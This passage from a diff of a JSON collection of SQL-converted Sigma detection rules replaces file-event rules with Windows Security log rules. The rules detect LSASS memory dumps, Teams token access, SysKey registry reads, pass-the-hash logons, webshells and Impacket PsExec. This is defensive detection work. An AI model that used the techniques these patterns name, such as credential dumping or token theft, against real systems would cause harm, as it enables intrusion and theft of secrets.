BlueDefenZer", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unlikely" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like 
Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "External Disk Drive Or USB Storage Device", + "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "status": "test", + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "author": "Keith Wright", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE 
'\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_external_device.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "status": "experimental", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "System administrators managing certififcates." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], 
"falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], 
"falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Unknown" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Addition of legitimate plugins" + "Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' 
ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "User Logoff Event", + "id": "0badd08f-c6a3-4630-90d3-6875cca440be", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects a user log-off activity. 
Could be used for example to correlate information during forensic investigations", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_user_logoff.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" 
+ "filename": "win_security_pcap_drivers.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Login with WMI", + "id": "5af54681-df95-4c26-854f-2565e13cfab0", + "status": "stable", + "description": "Detection of logins performed with WMI", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Monitoring tools", + "Legitimate system administration" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' 
ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_susp_wmi_login.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "author": "frack113", "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR 
TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "status": "test", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Office Macro File Creation From 
Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", + "title": "User with Privileges Logon", + "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_admin_logon.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell 
is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ - "System processes copied outside their default folders for testing 
purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE 